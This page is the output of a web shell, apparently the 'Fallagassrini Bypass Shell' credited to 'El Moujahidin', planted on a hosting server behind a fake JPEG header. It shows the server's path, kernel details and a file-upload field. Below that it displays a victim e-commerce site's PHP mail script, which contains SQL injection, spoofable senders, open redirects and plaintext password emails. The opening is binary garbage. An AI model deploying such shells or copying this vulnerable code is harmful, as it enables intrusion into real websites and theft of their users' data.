JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/mail/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/mail/mail_function.php

<?php
session_start();
//include("sql.php");
#####################################
# Include PHP Mailer Class
#####################################
require("class.phpmailer.php");
?>
<?php
#####################################
# Function to send email
#####################################
function sendEmail ($fromName, $fromEmail, $toEmail, $subject, $emailBody) {
	$mail = new PHPMailer();
	$mail->FromName = $fromName;
	$mail->From = $fromEmail;
	$mail->AddAddress("$toEmail");
		
	$mail->Subject = $subject;
	$mail->Body = $emailBody;
	$mail->isHTML(true);
	$mail->WordWrap = 150;
		
	if(!$mail->Send()) {
		return false;
	} else {
		return true;
	}
}

#####################################
# Function to Read a file 
# and store all data into a variable
#####################################
function readTemplateFile($FileName) {
		$fp = fopen($FileName,"r") or exit("Unable to open File ".$FileName);
		$str = "";
		while(!feof($fp)) {
			$str .= fread($fp,1024);
		}	
		return $str;
}
?>
<?php
#####################################
# Finally send email
#####################################
	
	if(isset($_REQUEST['forgot_pass']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	 
	  $email= $_REQUEST['forgot_pass'];
	  $url= $_REQUEST['url'];
$id=$_REQUEST['id'];
	   
		
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("forgot_template.html");
				
		//Replace all the variables in template file
		$email1=base64_encode($email);
		$message="You requested for your password. Please <a href='".$url."rest_password/index/".$id."'>Click here to reset your password</a>";
		$emailBody = str_replace("#email#",$email,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
		

	//Send email
	   $emailStatus = sendEmail ("Teacher VA",'raspreet29@gmail.com',$email,"Email from Teacher VA", $emailBody);
if($emailStatus==1)
{
$_SESSION['email']="Your Password Sent your Email";		 
}
else
{
$_SESSION['email']="Email not Sent";
}
	  		echo "<script type='text/javascript'>window.location='".$url."forgot_password'</script>";
	}
	
	
	if(isset($_REQUEST['email_w']))
	{
	//Data to be sent (Ideally fetched from Database)
	
		 $name_w= $_REQUEST['name_w'];
		 $email_w= $_REQUEST['email_w'];
		 $product_id= $_REQUEST['P'];
		 $from_email=$_REQUEST['f_id'];	
	
		 $message="You win the bid over the item ".$product_id;	
			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
		 
		 $_SESSION['sent']='Email successfully sent!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name_w,$emailBody);
		$emailBody = str_replace("#email#",$email_w,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
		$emailBody = str_replace("#url#",$url,$emailBody);

	//Send email
	 	 $emailStatus = sendEmail ("Shoptayo",$from_email,$email_w,"Email from Shoptayo", $emailBody);
         if($emailStatus==true)
         {
            $status='1';
         }
         else
         {
           	$status='0';
         } 
	
	  	echo "<script type='text/javascript'>window.location='../admin/bids/bid_notify/".$product_id."/".$status."'</script>";
	}


    if(isset($_REQUEST['dep']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	 	  $department= $_REQUEST['dep'];
	 	  $topic= $_REQUEST['tpc'];
	  	  $subtopic= $_REQUEST['stpc'];
          $severity= $_REQUEST['sev'];
          $csubject= $_REQUEST['sub'];
          $cmessage= $_REQUEST['msg'];
          $email1= $_REQUEST['email1'];
	 			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
			 
		$_SESSION['confirm_id']='Email successfully sent!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template1.html");
			
	//Replace all the variables in template file
		$emailBody = str_replace("#department#",$department,$emailBody);
		$emailBody = str_replace("#topic#",$topic,$emailBody);
		$emailBody = str_replace("#subtopic#",$subtopic,$emailBody);
        $emailBody = str_replace("#severity#",$severity,$emailBody);
        $emailBody = str_replace("#csubject#",$csubject,$emailBody);
        $emailBody = str_replace("#cmessage#",$cmessage,$emailBody); 
         
		$emailBody = str_replace("#url#",$url,$emailBody);


        $emailBody1 = readTemplateFile("template2.html");
			
	//Replace all the variables in template file
        $usermessage="Thanks for contacting us.We will revert back to you soon.";

		$emailBody1 = str_replace("#email#",$email1,$emailBody1); 
        $emailBody1 = str_replace("#usermessage#",$usermessage,$emailBody1); 
         
		$emailBody1 = str_replace("#url#",$url,$emailBody1);

	//Send email
		 $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$email1,"Email from Shoptayo", $emailBody1);
         $emailStatus1 = sendEmail ("Shoptayo",$email1,"contact@shoptayo.com","Email from Shoptayo", $emailBody);
	
	  echo "<script type='text/javascript'>window.location='../contact_success'</script>";
	}

//------------------------------for signup successfully-----------------------------------------------

    if(isset($_REQUEST['signup']))
	{
		   //Data to be sent (Ideally fetched from Database)
	  
			$email_s= $_REQUEST['signup'];
			$base_email=$email_s;
			$message="Thanks for registering with us. ";
			$user_type=$_REQUEST['user_type'];		
			//Send email to user containing username and password
			//Read Template File 
			$emailBody = readTemplateFile("template3.html");
					
			//Replace all the variables in template file
			
			$emailBody = str_replace("#email#",$base_email,$emailBody);
			$emailBody = str_replace("#msg#",$message,$emailBody);
		
			//Send email
			$emailStatus = sendEmail ("kiramiver.com","kiramiver.com",$email_s,"Email from kiramiver.com", $emailBody);
		    
		    if($user_type==1)
			{
			   $page='../';
			}
			elseif($user_type==2)
			{
			   $page='../';
			}
			elseif($user_type==3)
			{
			    $page='../';
			}
			
			else
			{
			   $page='../';
			}
			echo "<script type='text/javascript'>window.location='".$page."'</script>";
	}

	
	
	if(isset($_REQUEST['inv']))
	{
			   //Data to be sent (Ideally fetched from Database)
	  
			$email_s= $_POST['invoice_mail'];
			$paid_by= $_POST['paid_by'];
			$paid_to= $_POST['paid_to'];
			$due_date= $_POST['due_date'];
			$paid_on= $_POST['paid_on'];
			$amount= $_POST['amount'];
			$property= $_POST['property'];
			$base_email=$email_s;
			$message="Invoice Form";
			//Send email to user containing username and password
			//Read Template File 
			$emailBody = readTemplateFile("invoice_detail.php");
					
			//Replace all the variables in template file
			
			$emailBody = str_replace("#property#",$property,$emailBody);
			$emailBody = str_replace("#paidby#",$paid_by,$emailBody);
			$emailBody = str_replace("#paidto#",$paid_to,$emailBody);
			$emailBody = str_replace("#paidon#",$paid_on,$emailBody);
			$emailBody = str_replace("#amount#","$".$amount,$emailBody);
			$emailBody = str_replace("#duedate#",$due_date,$emailBody);
				   $page='../';
			//Send email
			$emailStatus = sendEmail ("kiramiver.com","kiramiver.com",$email_s,"Email from kiramiver.com", $emailBody);
			echo $emailBody;
			?>
			<script>
//window.location.href="http://localhost/rent_monitor/tenant/pay_rent";
			</script>
			<?php 
			
			
			
	}
	
	
	
    if(isset($_REQUEST['f_email']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	  		$name= $_REQUEST['f_name'];
	  		$email_f= $_REQUEST['f_email'];
            $password=base64_decode($_REQUEST['f_pass']); 
		  
	       $url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   
		   $main=$url1;

		}
		else
		{			
			$main="http://".$url1;

		}
		
		
		$val1=$main;
       $message="Your password is ".$password;
	


		 
		$_SESSION['confirm_id']='Email is sent successfully!';
		//Send email to user containing username and password
		//Read Template File 
		$emailBody = readTemplateFile("template5.html");
				
		//Replace all the variables in template file
		$emailBody = str_replace("#name#",$name,$emailBody);
		$emailBody = str_replace("#email#",$email,$emailBody);
		$emailBody = str_replace("#message#",$message,$emailBody);
$emailBody = str_replace("#reg#",$val1,$emailBody);
		$emailBody = str_replace("#url#",$url,$emailBody);

	//Send email
	   $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$email_f,"Email from Shoptayo", $emailBody);
	
	  echo "<script type='text/javascript'>window.location='../home'</script>";
	}
	
	
	if(isset($_REQUEST['tx_n']))
	{
	//Data to be sent (Ideally fetched from Database)
	
	  		$refno= $_REQUEST['tx_n'];
	  		$uid=$_REQUEST['uid'];
			$type= $_REQUEST['typ'];
			$paystatus= $_REQUEST['st'];
			
			$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
		$oror=explode('-',$refno);
		$sel_user=mysql_query("select * from  users where id='".$uid."'");
		$row_user=mysql_fetch_array($sel_user);
		$sel_email=$row_user['email'];
		$message='';
		
			if($oror[0]=='s')
			{
				if($paystatus==1)
				{
					$message ='Welcome to shoptayo!<br><br>Thanks your payment transaction done for auction deal<br><br>';
				}
				elseif($paystatus==2)
				{
					$message ='Welcome to shoptayo!<br>Sorry your payment transaction is pending for auction deal:-<br><br>';
				}
				else
				{
					$message="Your transaction is failed for auction deal." ;
				}
			}
			else
			{
			$sel=mysql_query("select * from orders where order_id='$refno'");
            $rowval=mysql_fetch_array($sel);
			
			if($paystatus==1)
			{
				$message ='Welcome to shoptayo!<br><br>Thanks For shopping from shoptayo.com and product details are given below:-<br><br>';
			}
			elseif($paystatus==2)
			{
				$message ='Welcome to shoptayo!<br>Sorry your payment transaction is pending and product details are given below:-<br><br>';
			}
			if($paystatus==1 || $paystatus==2)
			{
				$ord1=mysql_query("select * from order_products where order_id='$refno' and user_id='".$uid."'");
				$nums=mysql_num_rows($ord1);
				if($nums>0)
				{
					$message .='<table>
					<tr>
					<td>Product Name</td>
					<td>Product Price</td>
					<td>Product Quantity</td>
					<td>Coupons Discount</td>
					<td>Total Price</td>
					<td>Transaction status</td>
					</tr>';
					while($num_pro1=mysql_fetch_array($ord1))
					{
						$prd_name=$num_pro1['product_name'];
						$quantity=$num_pro1['quantity'];
						$price=$num_pro1['price'];
						$coupon=$num_pro1['coupon'];
						$status1=$num_pro1['status'];
						$total=($quantity*$price)-$coupon;
						if($status1==1)
						{
						$status='Success';
						}else
						{
						$status='Pending';
						}
											
						$message .='<tr>
						<td>'.$prd_name.'</td>
						<td>'.$price.'</td>
						<td>'.$quantity.'</td>
						<td>'.$coupon.'</td>
						<td>'.$total.'</td>
						<td>'.$status.'</td>
						</tr>';	
				 	}	
				 	$message .='</table>';
					
					if($paystatus==1)
			{
			$message .='<br><br><a href="'.$url.'view_voucher">Click here for view product voucher.</a>';
			}
				}
			}
			else
			{
				$message="Your payment for the products of total price P".$rowval['net_payment']." is failed." ;
			}
			}
        	
		$_SESSION['confirm_id']='Email is sent successfully!';
			//Send email to user containing username and password
			//Read Template File 
			$emailBody = readTemplateFile("template4.html");
					
			//Replace all the variables in template file
			$emailBody = str_replace("#sel_email#",$sel_email,$emailBody);
			$emailBody = str_replace("#message#",$message,$emailBody);
			$emailBody = str_replace("#url#",$url,$emailBody);
		
		//Send email
		   $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$sel_email,"Email from Shoptayo", $emailBody);
		   
	  	echo "<script type='text/javascript'>window.location='../shoptayo_cart/response_mail/".$refno."/".$paystatus."/".$type."'</script>";
	}
	
	
	
	if(isset($_REQUEST['p_n']))
	{
	//Data to be sent (Ideally fetched from Database)
	
$pid= base64_encode($_REQUEST['pid']);	 	  
$p_n= $_REQUEST['p_n'];
	 	  $r_p= $_REQUEST['r_p'];
	  	  $d_p= $_REQUEST['d_p'];
          $s_d= $_REQUEST['s_d'];
          $e_d= $_REQUEST['e_d'];
          $p_code= $_REQUEST['p_code'];
          $emails= $_REQUEST['emails'];
          $name= $_REQUEST['name'];
	 			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
			 $pid=$url.'deal_view/index/'.$pid;
		$_SESSION['confirm_id']='Your deal has been added successfully. It will take 2 weeks in approval from Admin!';

$message='Your deal has been added successfully. It will take 2 weeks in approval from Admin!';
		//Send email to user containing username and password
		//Read Template File 
        
		$emailBody = readTemplateFile("template6.html");
			
	//Replace all the variables in template file
		$emailBody = str_replace("#p_n#",$p_n,$emailBody);
		$emailBody = str_replace("#r_p#",$r_p,$emailBody);
		$emailBody = str_replace("#d_p#",$d_p,$emailBody);
        $emailBody = str_replace("#s_d#",$s_d,$emailBody);
        $emailBody = str_replace("#e_d#",$e_d,$emailBody);
        $emailBody = str_replace("#p_code#",$p_code,$emailBody);
        $emailBody = str_replace("#name#",$name,$emailBody); 


$emailBody = str_replace("#msg#",$message,$emailBody); 
         
		$emailBody = str_replace("#url#",$url,$emailBody);
$emailBody = str_replace("#view#",$pid,$emailBody); 


        
	//Send email
	echo	 $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$emails,"Email from Shoptayo", $emailBody);
if($emailStatus==1)
		{
			$_SESSION['updated']='Email is sent successfully';
		}
		else
		{
			$_SESSION['updated']='Email is not sent successfully';
		}
        
	exit;
	  echo "<script type='text/javascript'>window.location='../view_listing'</script>";
	}
	
	
	if(isset($_REQUEST['buy_email']))
	{
	//Data to be sent (Ideally fetched from Database)
          $emails= $_REQUEST['buy_email'];
	 			
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
		
		$_SESSION['confirm_id']='Request has been approved successfully.';
		$message='Your request has been approved successfully by seller. Please login and check your approved schedule request!';
		//Read Template File 
        
		$emailBody = readTemplateFile("template7.html");
			
	//Replace all the variables in template file
		$emailBody = str_replace("#msg#",$message,$emailBody); 
        $emailBody = str_replace("#url#",$url,$emailBody);
		$emailBody = str_replace("#name#",$emails,$emailBody);
        
	//Send email
		 $emailStatus = sendEmail ("Shoptayo","contact@shoptayo.com",$emails,"Email from Shoptayo", $emailBody);
        
	
	  echo "<script type='text/javascript'>window.location='../seller_schedule_view'</script>";
	}
	
	if(isset($_REQUEST['sen']))
	{
		$sender= base64_decode($_REQUEST['sen']);
		$receiver= base64_decode($_REQUEST['rec']);
		$subject= $_REQUEST['sub'];
		$message= $_REQUEST['msg'];
		$deal_id=base64_decode($_REQUEST['id']);
		
		$url1=$_SERVER['SERVER_NAME']."/";
		if (strpos($url1, 'http')<0) {
		   $url = $url1;
		}
		else
		{
			$url = "http://".$url1;
		}
		
		$emailBody = readTemplateFile("message.html");
			
	//Replace all the variables in template file
		
		$emailBody = str_replace("#message#",$message,$emailBody); 
		$emailBody = str_replace("#subject#",$subject,$emailBody); 
        $emailBody = str_replace("#url#",$url,$emailBody);
		        
	//Send email
		$emailStatus = sendEmail ("Shoptayo",$sender,$receiver,"Email from Shoptayo", $emailBody);
		if($emailStatus==1)
		{
			$_SESSION['updated']='Email is sent successfully';
		}
		else
		{
			$_SESSION['updated']='Email is not sent successfully';
		}
		
		
		echo "<script type='text/javascript'>window.location='../admin/deal_mgmt/index/".$deal_id."'</script>";
		
	}
	
	
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net